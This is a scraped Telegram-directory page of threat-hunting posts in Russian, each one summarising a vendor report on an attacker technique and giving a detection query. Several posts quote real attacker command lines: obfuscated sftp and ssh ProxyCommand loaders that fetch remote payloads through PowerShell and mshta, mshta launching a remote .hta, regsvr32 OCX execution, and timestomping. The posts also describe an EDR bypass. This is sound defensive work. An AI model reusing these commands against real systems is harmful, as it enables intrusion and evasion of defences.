Труха⚡️Україна
Труха⚡️Україна
Переглянути
Николаевский Ванёк
Николаевский Ванёк
Переглянути
Реальна Війна | Україна | Новини
Реальна Війна | Україна | Новини
Переглянути
Труха⚡️Україна
Труха⚡️Україна
Переглянути
Николаевский Ванёк
Николаевский Ванёк
Переглянути
Реальна Війна | Україна | Новини
Реальна Війна | Україна | Новини
Переглянути
Know Your Adversary avatar

Know Your Adversary

https://www.knowyouradversary.ru/
Рейтинг TGlist
0
0
ТипПублічний
Верифікація
Не верифікований
Довіреність
Не надійний
Розташування
МоваІнша
Дата створення каналуСіч 01, 2025
Додано до TGlist
Квіт 02, 2025
Я власник каналу
Історія змін
Прикріплена група
Know Your Adversary Chat
Know Your Adversary Chat
2

Рекорди

16.05.202523:59
422Підписників
11.01.202523:59
0Індекс цитування
22.01.202523:59
445Охоплення 1 допису
22.01.202523:59
445Охоп рекл. допису
08.02.202523:59
7.07%ER
13.05.202516:47
30.79%ERR

Розвиток

Детальніше
Підписників
Індекс цитування
Охоплення 1 допису
Охоп рекл. допису
ER
ERR
ЛЮТ '25БЕР '25КВІТ '25ТРАВ '25
Детальніше

Популярні публікації Know Your Adversary

Всі дописи
Post media background
Post media
09.05.202513:25
Всем привет!

Вот ещё один любопытный случай злоупотребления легитимным программным обеспечением. Согласно отчёту Synactiv, группировка Hunters International использует KickIdler — легитимную программу для мониторинга сотрудников — чтобы шпионить за жертвой, проводить разведку и похищать учётные данные.

Этот инструмент, например, позволяет злоумышленникам выполнять кейлоггинг, захват экрана, запись звука, удалённое управление, а также предоставляет другие интересные функции с точки зрения атакующего.

Во-первых, можно охотиться за файлами с соответствующей подписью:

event_type: "processcreatewin"

AND

proc_file_sig: "TELE LINK SOFT (TLS) CY LTD"


Далее — запросы DNS, связанные с инструментом:

event_type: "dnsreqwin"

AND

dns_rname: "my.kickidler.com"


Можно также отслеживать создание файлов в связанных директориях:

event_type: "filecreatewin"

AND

file_path: "TeleLinkSoftHelper"


Увидимся завтра!

English version
Post media background
Post media
11.05.202507:45
Всем привет!

Стилеры повсюду! И злоумышленники постоянно находят новые способы доставки. Сегодня посмотрим, как атакующие, распространяющие Lumma Stealer, злоупотребляют SFTP.

Согласно отчёту компании Sophos, злоумышленники распространяли вредоносные LNK-файлы, замаскированные под PDF-документы, которые использовали sftp.exe для выполнения обфусцированной команды:

C:\Windows\System32\OpenSSH\sftp.exe -o ProxyCommand="powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/W7]]]7Z9]]]].mp4]]'  -replace ']')


Как и в случае, который мы недавно обсуждали, злоумышленники использовали параметр ProxyCommand для проксирования выполнения команды. И, конечно, мы можем использовать это как маркер для охоты:

event_type: "processcreatewin"

AND

proc_file_name: "sftp.exe"

AND

cmdline: "proxycommand"


Увидимся завтра!

English version
Post media background
Post media
30.04.202515:40
Всем привет!

Мы всё чаще видим использование инструментов для туннелирования. Настолько часто, что такие утилиты, как ngrok и chisel, сегодня зачастую мгновенно обнаруживаются и блокируются (правда ведь?). Что это значит? Злоумышленники всегда ищут альтернативы!

И одной из таких альтернатив является iox — это инструмент с открытым исходным кодом для проброса портов и проксирования внутри сети. Например, его использовала группа, стоящая за вымогателем Ghost.

Этот инструмент часто применяется для проброса портов RDP и SSH, это мы и можем использовать для поиска:

event_type: "processcreate"

AND

cmdline: "fwd" AND ("22" OR "3389")


Больше информации об инструменте можно найти здесь.

Увидимся завтра!
Post media background
Post media
17.05.202516:16
Всем привет!

Читая различные отчёты, я снова и снова вижу, как злоумышленники злоупотребляют mshta.exe. Очень часто они применяют его для запуска размещённого удалённо вредоносного .hta-файла.

Вот недавний пример из отчёта Qualys:

"C:\Windows\system32\mshta.exe" https://mytaxclientcopy[.]com/xlab22.hta


Стоит ли нам иметь запросы для охоты на подобную активность? Конечно! Да, потому что не все .hta-файлы, запускаемые с удалённых хостов, являются вредоносными. Тем не менее, у вас не должно быть слишком большого количества срабатываний.

Чтобы построить запрос для охоты, можно, например, использовать ключевые слова "http" и "https":

event_type: "processcreatewin"

AND

proc_file_name: "mshta.exe"

AND

cmdline: ("http" OR "https")


Увидимся завтра!

English version
Post media background
Post media
01.05.202512:40
Всем привет!

Читая отчет Trend Micro об Earth Kasha, я заметил любопытный поведенческий маркер ROAMINGMOUSE: он использует WMI для запуска JSLNTOOL.EXE через explorer.exe. JSLNTOOL.EXE — это легитимное приложение, которое злоумышленник использует для сайдлоадинга JSFC.dll — вредоносного загрузчика.

Это означает, что мы можем искать подозрительные запуски explorer.exe через wmiprvse.exe с помощью следующего запроса:

event_type: "processcreatewin"

AND

proc_file_path: "explorer.exe"

AND

proc_p_file_path: "wmiprvse.exe"


Что касается JSLNTOOL.EXE, можно также искать связанные события запуска, обращая внимание на нетипичные расположения:

event_type: "processcreatewin"

AND

proc_file_originalfilename: "jslntool.exe"

AND NOT

proc_file_path: "justsystems"


Увидимся завтра!

English version
Post media background
Post media
13.05.202515:12
Всем привет!

Сегодня мы обсудим свежий отчёт от Microsoft Threat Intelligence о группе Marbled Dust. Злоумышленники использовали уязвимость нулевого дня в Output Messenger Server Manager (CVE-2025-27920).

Эта уязвимость позволила атакующим загружать вредоносные файлы в папку автозагрузки сервера. Например, злоумышленник поместил вредоносные файлы OM.vbs и OMServerService.vbs в папку автозагрузки Output Messenger и файл OMServerService.exe в каталог C:\Users\public\videos на сервере.

Во-первых, можно охотиться за подозрительными .vbs-файлами, запускаемыми из папки автозагрузки:

event_type: "processcreatewin"

AND

cmdline: ("startup" AND "vbs")


Во-вторых, можно искать подозрительные файлы, запускаемые из C:\Users\public\videos:

event_type: "processcreatewin"

AND

proc_file_path: "users\\public\\videos"


Увидимся завтра!

English version
Post media background
Post media
18.05.202516:03
Всем привет!

Злоумышленники часто злоупотребляют легитимными сайтами для передачи файлов — как для эксфильтрации данных, так и для загрузки инструментов. Например, это делает группа Scattered Spider (также известная как Muddled Libra, 0ktapus, Scatter Swine, UNC3944).

Согласно отчёту Unit42, злоумышленники использовали следующие сайты для передачи файлов:
put[.]io, transfer[.]sh, wasabi[.]com, gofile[.]io.

Как всегда, мы можем использовать эту информацию для создания запроса для охоты на угрозы, например:

event_type: dnsreq*

AND

dns_rname: ("put.io" OR "transfer.sh" OR "wasabi.com" OR "gofile.io")


Увидимся завтра!

English version
02.05.202508:14
Всем привет!

Мы уже несколько раз говорили о том, как злоумышленники используют PowerPoint для доставки вредоносного ПО. Пора обсудить это снова!

Seqrite опубликовала отчет о деятельности APT36 (мы отслеживаем этот кластер под названием Translucent Werewolf). Согласно исследованию, злоумышленники использовали файлы надстроек PowerPoint (PPAM) для доставки Crimson RAT.

По моим наблюдениям, такие файлы довольно редки в современных инфраструктурах, поэтому мы можем искать события открытия PPAM-файлов:

event_type: "processcreatewin"

AND

proc_file_name: "powerpnt.exe"

AND

cmdline: "ppam"


Увидимся завтра!

English version
Post media background
Post media
06.05.202514:32
Всем привет!

Очередной день — очередной способ обхода EDR. В недавнем отчёте команда реагирования на инциденты Stroz Friedberg компании Aon выявила технику Bring Your Own Installer, которую злоумышленник использовал для обхода и отключения SentinelOne EDR.

Злоумышленник воспользовался легитимным установщиком SentinelOne EDR для запуска процесса обновления агента, но прервал его, завершив процесс msiexec.exe, связанный с обновлением версии SentinelOne.

Если такая возможность ещё есть, можно попытаться отследить подозрительные события завершения процесса msiexec.exe, например, с помощью taskkill:

event_type: "processcreatewin"

AND

proc_file_name: "taskkill"

AND

cmdline: "msiexec"


Увидимся завтра!

English version
Post media background
Post media
04.05.202511:29
Всем привет!

Продолжаю пополнять свою коллекцию PowerShell! Сегодня утром я читал вот этот отчет и заметил ещё один реальный пример злоупотребления PowerShell для подмены временных меток (timestomping).

Злоумышленник создавал запланированные задачи для запуска MeshAgent, а затем выполнял команды PowerShell для изменения временных меток связанных файлов. Вот примеры:

(Get-Item “.\vcruntime140_1.dll”).LastAccessTime=(“12 May 2024 11:14:00”) `


Например, мы можем использовать события ScriptBlock для охоты на злоупотребление командлетом Get-Item:

event_type: "ScriptExecutionWin"

AND

script_text: "get-item" AND ("lastaccesstime" OR "lastwritetime" OR "creationtime")


Удачной охоты!

Увидимся завтра!

English version
Post media background
Post media
05.05.202517:00
Всем привет!

Вчера мы говорили о некоторых новых инструментах, разработанных злоумышленником, известным как Venom Spider. Но давайте немного поговорим о классических инструментах, с которыми он также ассоциируется. Я имею в виду бэкдор more_eggs. Он всё ещё используется — например, вот свежая кампания, о которой пишет Arctic Wolf.

Хочу обратить внимание на следующий поведенческий маркер — msxsl.exe, легитимный бинарный файл, известный как Microsoft Command Line Transformation Utility, используется для запуска бэкдора:

msxsl.exe D30F38D93CA9185.txt D30F38D93CA9185.txt


Мы можем использовать этот маркер для построения поискового запроса:

event_type: "processcreatewin"

AND

proc_file_name: "msxsl.exe"

AND

cmdline: "txt"


А вы замечали использование msxsl.exe в своей инфраструктуре?

Увидимся завтра!

English version
Post media background
Post media
10.05.202514:52
Всем привет!

Злоумышленники всегда стремятся слиться со скомпрометированной инфраструктурой. Мы уже много говорили о различных легитимных инструментах, которые используются хакерами, но во многих случаях им даже не нужно приносить с собой такие инструменты.

Например, согласно отчету Cisco Talos, вымогатели Cactus убеждали жертв запустить сессию удаленного доступа с помощью Microsoft Quick Assist и даже помогали им установить эту программу, если она не была предварительно установлена в системе пользователя.

Такая активность может быть отличной целью для охоты на угрозы. Запрос может быть таким простым:

event_type: "processcreatewin"

AND

proc_file_name: "QuickAssist.exe"


Надеюсь, ваши миссии по Threat Hunting проходят успешно!

Увидимся завтра!

English version
Post media background
Post media
16.05.202515:06
Всем привет!

Уверен, вы знаете, что злоумышленникам всегда необходимо собирать информацию о скомпрометированной системе. В большинстве случаев это происходит на ранних этапах жизненного цикла атаки, поэтому всегда полезно иметь соответствующие запросы для охоты на угрозы.

Рассмотрим следующий пример, связанный с TA406:

$rc = Get-ChildItem ([Environment]::GetFolderPath('Recent'))


Как видно, противник собирает информацию о недавно использованных файлах, процессах, антивирусном ПО и т. д. Всё это, конечно, может быть использовано при проведении охоты на угрозы!

Например, так как это фрагмент PowerShell-скрипта, мы можем искать сбор информации о недавно открытых файлах в ScriptBlock:

event_type: "ScriptExecutionWin"

AND

script_text: ("get-childitem" AND "environment" AND "getfolderpath" AND "recent")


То же самое можно сказать и о других техниках, конечно.

Увидимся завтра!

English version
Post media background
Post media
03.05.202512:39
Всем привет!

Insikt Group раскрыла два новых семейства вредоносных программ: TerraStealerV2 и TerraLogger. Оба были приписаны злоумышленнику, известному как Golden Chickens. Этот злоумышленник предоставляет инструменты другим преступникам, работая по модели Malware-as-a-Service (MaaS).

Я ознакомился с отчетом и (как всегда) нашел несколько возможностей для обнаружения.

Например, злоумышленник использовал ssh.exe для проксирования выполнения PowerShell:

ssh.exe -o ProxyCommand="powershell powershell ('datashieldsecure.com nikbfgppdkfjsfj msh ta run.mp4 http:'|Convert-String -E '1 2 3 4 5 6=34 6//1/2/5')"


Мы можем искать подобную активность с помощью следующего запроса:

event_type: "processcreatewin"

AND

proc_file_name: "ssh.exe"

AND

cmdline: "proxycommand"


Еще один пример, злоумышленник использует regsvr32.exe для выполнения вредоносного OCX-файла:

regsvr32.exe /s /i C:\Users\[redacted]\AppData\Local\Temp\2549828850.ocx


Мы можем использовать следующий запрос для поиска выполнения OCX-файлов из папок Temp:

event_type: "processcreatewin"

AND

proc_file_name: "regsvr32.exe"

AND

cmdline: "temp" AND "ocx"


Еще пример: стилер использует ifconfig[.]me для сбора информации о IP-адресе скомпрометированной системы, мы также можем использовать это для проактивного поиска:

event_type: "dnsreq"

AND

dns_rname: "ifconfig.me"


Обязательно ознакомьтесь с отчетом — в нем полно идей для разработки детектирующей логики!

Увидимся завтра!

English version
Post media background
Post media
20.04.202519:15
Всем привет!

Уверен, что все уже слышали о CVE-2025-24054, уязвимости, связанной с раскрытием хеша NTLM через спуфинг.

Check Point опубликовала отчёт с обзором того, как эта уязвимость используется в реальных атаках. Эксплуатация уязвимости происходит с минимальным взаимодействием со стороны пользователя — например, при выборе, просмотре или выполнении любого действия с файлом, кроме его открытия или запуска.

Злоумышленники используют вредоносные файлы с расширением .library-ms, которые распространяются через фишинговые письма. Файлы с таким расширением встречаются довольно редко, поэтому мы можем отследить их появление по событиям создания файлов:

event_type: "filecreate"

AND

file_path: "library-ms"


Увидимся завтра!

English version
Увійдіть, щоб розблокувати більше функціональності.